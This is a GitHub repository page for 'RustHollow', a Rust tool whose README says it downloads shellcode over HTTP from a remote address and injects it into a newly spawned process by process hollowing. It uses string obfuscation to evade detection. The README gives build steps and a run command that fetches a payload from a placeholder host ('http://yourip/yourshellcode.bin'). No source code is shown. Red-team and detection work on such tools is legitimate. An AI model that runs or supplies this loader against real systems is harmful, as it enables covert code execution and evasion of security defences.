Skip to content

Inject a shellcode in a remote process using Process Hollowing.

Notifications You must be signed in to change notification settings

Kudaes/RustHollow

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

RustHollow

This tool will use HTTP to download a shellcode from a remote address and inject it in a newly spawned process by using the process hollowing technique. Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

After that, simply compile the code and execute it:

cargo build
rust_hollow.exe http://yourip/yourshellcode.bin

About

Inject a shellcode in a remote process using Process Hollowing.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages